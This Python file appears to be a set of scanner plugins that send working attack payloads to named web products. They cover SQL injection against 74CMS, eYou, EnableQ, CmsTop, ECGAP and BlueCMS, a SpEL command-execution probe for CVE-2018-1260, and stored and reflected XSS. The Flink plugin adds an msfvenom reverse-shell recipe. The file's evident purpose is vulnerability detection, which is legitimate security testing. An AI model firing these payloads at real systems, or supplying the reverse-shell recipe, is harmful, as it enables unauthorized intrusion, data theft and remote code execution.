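    Returns None. A hit is HTTP 200 with ``remote_path`` (case-insensitive)
    in the body; such a file usually also carries host, user and password,
    so the stored evidence is sensitive. Exceptions go to ErrorHandling/ErrorLog.

    Fix: Accept-Language/Accept-Encoding were written into the caller's
    ``Headers`` dict; if that dict is shared across plugins the mutation
    leaked into later requests. A copy is modified instead.
    """
    proxies = Proxies().result(proxies)
    try:
        payload_url = Url + '/sftp-config.json'
        request_headers = dict(Headers or {})
        request_headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
        request_headers["Accept-Encoding"] = "gzip, deflate"
        # verify=False: scanner deliberately accepts self-signed certificates.
        resp = requests.get(payload_url, headers=request_headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        if resp.status_code == 200 and 'remote_path' in con.lower():
            Medusa = "{}存在Sftp信息泄露漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n漏洞详情:{}\r\n".format(Url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, Url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(Url), str(Medusa))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + Url, e)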
def medusa(**kwargs) -> None:
    """Probe 74CMS ``/plus/ajax_officebuilding.php?act=key`` for wide-byte SQL injection.

    kwargs: ``Url`` (target base URL), ``Headers``, ``Proxies``. Returns
    None; a hit requires HTTP 200 and md5(7836457)
    (``3438d5e3ead84b2effc5ec33ed1239f5``) in the body. The wide byte is
    sent fully percent-encoded (``%E9%94%A6``) and the SQL keywords are
    split to defeat the CMS filter. Exceptions go to ErrorHandling/ErrorLog.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        endpoint = ("/plus/ajax_officebuilding.php?act=key&key=asd%E9%94%A6%27%20uniounionn%20selselectect"
                    "%201,2,3,md5(7836457),5,6,7,8,9%23")
        payload_url = url + endpoint
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=Headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        if response.status_code == 200 and '3438d5e3ead84b2effc5ec33ed1239f5' in text:
            report = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, response, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(**kwargs) -> None:
    """Probe eYou ``/user/?q=help&type=search`` for UNION SQL injection via ``kw``.

    kwargs: ``Url`` (target base URL), ``Headers``, ``Proxies``. Returns
    None; a hit requires HTTP 200 and MD5(1)
    (``c4ca4238a0b923820dcc509a6f75849b``) in the body.
    Exceptions go to ErrorHandling/ErrorLog, never raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        payload_url = url + "/user/?q=help&type=search&page=1&kw=-1%22)%20UNION%20ALL%20SELECT%201,2,3,concat(0x7c,MD5(1)),5,6,7%23"
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=Headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        if response.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in text:
            report = "{}存在eYouSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, response, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def Git(self, url):
    """Check whether ``url/.git/config`` is served (exposed Git repository).

    Args:
        self: scanner instance providing GetRequest, Token and TargetUrl.
        url: target base URL.

    Returns None. A hit is HTTP 200 with ``repositoryformatversion``
    (case-insensitive) in the body. On success the finding is written via
    VulnerabilityDetails and WriteFile; failures go to ErrorLog then
    ErrorHandling and are never raised.
    """
    Algroup = "GitVersionManagementSourceLeakVulnerability"
    Name = "Git版本管理源码泄露漏洞"
    Affects = "Git"
    config_url = url + '/.git/config'
    try:
        response = self.GetRequest(config_url)
        text = response.text
        if response.status_code == 200 and 'repositoryformatversion' in text.lower():
            report = "{}存在{}\r\n漏洞详情:{}\r\n".format(config_url, Name, text)
            info = TargetInfo(report, Algroup, Name, Affects)
            VulnerabilityDetails(info.info, config_url, self.Token).Write()  # persist url + evidence
            WriteFile().result(str(self.TargetUrl), str(report))
    except Exception as e:
        ErrorLog().Write(url, Name)  # log target URL and the failing plugin name
        plugin = TargetInfo('', Algroup, Name, Affects).info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
def medusa(**kwargs) -> None:
    """Fingerprint an Apache Flink dashboard with the unauthenticated ``/jar/upload`` endpoint.

    kwargs: ``Url`` (target base URL), ``Headers``, ``Proxies``. Returns
    None; a hit is a GET to ``/jar/upload`` answering 404 with the Flink
    text ``Unable to load requested file /jar/upload``. That proves the
    endpoint exists, not that uploads succeed — treat the report as
    "exposed", not "exploited". The report embeds upstream manual
    follow-up notes (msfvenom jar upload); nothing is uploaded here.
    Exceptions go to ErrorHandling/ErrorLog, never raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        payload_url = url + '/jar/upload'
        getshell = "msfvenom -p java/shell_reverse_tcp lhost=you_ip lport=5555 -f jar >/root/Desktop/shell.jar\r\n生成jar包后在主页找到Submit New Job位置上传jar包\r\n最后点进上传好的jar包后再点击Submit即可在nc上getshell"
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=Headers, proxies=proxies,
                                timeout=6, verify=False)
        text = response.text
        if "Unable to load requested file /jar/upload" in text and response.status_code == 404:
            report = "{}存在Flink未授权命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回内容:{}\r\nGetshell方法:\r\n{}\r\n".format(url, payload_url, response.text, getshell)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, response, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(**kwargs) -> None:
    """Probe EnableQ ``Export.log.inc.php`` for SQL injection through the base64 ``ExportSQL`` parameter.

    kwargs: ``Url`` (target base URL), ``Headers``, ``Proxies``. Returns
    None; a hit requires HTTP 200 and MD5(1)
    (``c4ca4238a0b923820dcc509a6f75849b``) in the body. The ``ExportSQL``
    value decodes to a SELECT over ``eq_administratorslog``/``eq_administrators``
    that concatenates MD5(1) with ``database()``, so the response also
    discloses the database name. Exceptions go to ErrorHandling/ErrorLog.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        endpoint = '/enableq/enableq91_php52/Export/Export.log.inc.php?ExportSQL=U0VMRUNUIGEuKixjb25jYXQoTUQ1KDEpLCc6JyxkYXRhYmFzZSgpKSBhcyBhZG1pbmlzdHJhdG9yc05hbWUgRlJPTSBlcV9hZG1pbmlzdHJhdG9yc2xvZyBhLCBlcV9hZG1pbmlzdHJhdG9ycyBiIFdIRVJFIGEuYWRtaW5pc3RyYXRvcnNJRD1iLmFkbWluaXN0cmF0b3JzSUQgT1JERVIgQlkgYS5hZG1pbmlzdHJhdG9yc0xvZ0lEIERFU0M='
        payload_url = url + endpoint
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=Headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        if response.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in text:
            report = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, response, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(**kwargs) -> None:
    """Probe CmsTop ``vote/total`` for UNION SQL injection via ``contentid``.

    kwargs: ``Url`` (target base URL), ``Headers``, ``Proxies``. Returns
    None; a hit is md5('c') in the body. The payload selects from
    ``cmstop_admin`` but returns only the fixed digest, no account data.
    Exceptions go to ErrorHandling/ErrorLog, never raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        endpoint = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#"
        payload_url = url + endpoint
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=Headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        if '4a8a08f09d37b73795649038408b5f33' in text:  # md5('c')
            report = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, response, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(**kwargs) -> None:
    """Probe Spring Security OAuth2 for SpEL injection in ``scope`` (CVE-2018-1260).

    kwargs: ``Url`` (target base URL), ``Headers``, ``Proxies``. Returns
    None. The ``scope`` parameter carries a SpEL expression that makes the
    target run ``ping <dnslog-host>``; after a 4-second grace period the
    plugin reports when the DNSlog host has resolved. This executes a
    command on the target (a ping), unlike the passive checks in this
    corpus. ``redirect_uri`` points at a third-party host and is only
    needed to pass authorize-endpoint validation.
    Exceptions go to ErrorHandling/ErrorLog, never raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        DL = Dnslog()
        endpoint = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(DL.dns_host())
        payload_url = url + endpoint
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=Headers, proxies=proxies,
                                timeout=6, verify=False)
        time.sleep(4)  # give the out-of-band DNS lookup time to land
        if DL.result():
            report = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(
                url, response.text, DL.dns_host(), str(DL.dns_text()))
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, response, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def CompressedFileThread(self, urls, Algroup, Name, Affects):
    """Check one candidate URL for a downloadable archive (backup-file leak).

    Args:
        self: scanner instance providing GetRequest, Token and TargetUrl.
        urls: the exact URL to fetch.
        Algroup, Name, Affects: plugin metadata forwarded to TargetInfo.

    Returns None. A hit is HTTP 200 whose ``Content-Type`` header is exactly
    one of the zip/rar/gzip types below — a header with parameters
    (``; charset=...``) will not match. Note that the full (binary) body is
    copied into the text report. Failures go to ErrorLog then
    ErrorHandling and are never raised.
    """
    ARCHIVE_TYPES = (
        "application/zip",
        "application/x-rar-compressed",
        "application/x-gzip",
        "application/gzip",
    )
    try:
        response = self.GetRequest(urls)
        text = response.text
        content_type = response.headers.get("Content-Type")
        if response.status_code == 200 and content_type in ARCHIVE_TYPES:
            report = "{}存在{}\r\n漏洞详情:{}\r\n".format(urls, Name, text)
            info = TargetInfo(report, Algroup, Name, Affects)
            VulnerabilityDetails(info.info, urls, self.Token).Write()  # persist url + evidence
            WriteFile().result(str(self.TargetUrl), str(report))
    except Exception as e:
        ErrorLog().Write(urls, Name)  # log target URL and the failing plugin name
        plugin = TargetInfo('', Algroup, Name, Affects).info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe 74CMS ``/upload/plus/ajax_street.php?act=key`` for wide-byte SQL injection.

    Args:
        Url: target base URL, split by UrlProcessing.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A hit is md5('c') in the body. Exceptions go to
    ErrorHandling/ErrorLog, never raised.

    NOTE(review): the payload is a boolean condition on md5(c) from
    qs_admin, yet the match expects the literal digest in the body — confirm
    against a known-vulnerable instance.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = "/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),1,1))=97 as signed) %23"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        if '4a8a08f09d37b73795649038408b5f33' in text:  # md5('c')
            report = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe three ECGAP (MSSQL) endpoints for error-based SQL injection.

    Args:
        Url: target base URL, split by UrlProcessing().result.
        Headers: request headers supplied by the caller (not modified).
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. Each endpoint gets the same suffix, which forces
    ``hashbytes('MD5','1234')`` into an error; a hit is HTTP 200 and
    md5(1234) (``81dc9bdb52d04dc20036dbd8313ed055``) in the body. Every
    endpoint has its own try/except so one failure does not stop the
    others; errors go to ErrorHandling/ErrorLog.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    endpoints = [
        "/Login/Log.aspx?loginname=",
        "/ViewSource/SrcWorkProgram.aspx?infoflowId=",
        "/OnlineQuery/GetFlowItem.aspx?DeptId=",
    ]
    suffix = "%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--"
    for endpoint in endpoints:
        try:
            payload_url = "{}://{}:{}{}{}".format(scheme, url, port, endpoint, suffix)
            # verify=False: scanner deliberately accepts self-signed certificates.
            response = requests.get(payload_url, headers=Headers, proxies=proxies,
                                    timeout=6, verify=False)
            text = response.text
            if response.status_code == 200 and "81dc9bdb52d04dc20036dbd8313ed055" in text:
                report = "{}存在ECGAPSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                    url, payload_url, text)
                info = VulnerabilityInfo(report)
                VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
                WriteFile().result(str(url), str(report))  # per-target result file
        except Exception as e:
            plugin = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, plugin)
            ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe BlueCMS ``/ad_js.php`` for UNION SQL injection via ``ad_id``.

    Args:
        Url: target base URL, split by UrlProcessing.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A hit is md5(3.1415)
    (``63e1f04640e83605c1d177544a5a0488``) in the body.
    Exceptions go to ErrorHandling/ErrorLog, never raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=headers, proxies=proxies,
                                timeout=6, verify=False)
        text = response.text
        if "63e1f04640e83605c1d177544a5a0488" in text:
            report = "{}存在BlueCMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, Token, proxies=None):
    """Probe EasyCMS article insert for stored cross-site scripting.

    Args:
        Url: target base URL, split by UrlProcessing().result.
        RandomAgent: User-Agent string.
        Token: handed through to VulnerabilityDetails.
        proxies: optional proxy spec, normalised by Proxies().result.

    Returns None. A 20-character random marker is embedded in an
    ``<img onerror=alert(...)>`` title; a hit is HTTP 200 with that exact
    tag reflected inside a ``<td>``. This POST CREATES an article on the
    target — a persistent artifact that remains after the scan and must
    be removed by the operator. Exceptions go to ErrorHandling/ErrorLog.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        marker = randoms().result(20)
        endpoint = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent"
        body = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert({})%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''.format(marker)
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.post(payload_url, headers=headers, data=body,
                                 proxies=proxies, timeout=6, verify=False)
        text = response.text
        reflected = "<td><img src=x onerror=alert({})></td>".format(marker)
        if response.status_code == 200 and reflected in text:
            report = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, Token).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe Chamilo LMS ``agenda_list.php`` for reflected XSS via ``type``.

    Args:
        Url: target base URL, split by UrlProcessing().result.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A 20-character random marker inside
    ``<script>confirm(...)</script>`` is sent and a hit is that exact tag
    reflected unescaped in the body (status code is not checked).
    Exceptions go to ErrorHandling/ErrorLog, never raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        marker = randoms().result(20)
        endpoint = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format(marker)
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        reflected = "<script>confirm({})</script>".format(marker)
        if reflected in text:
            report = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)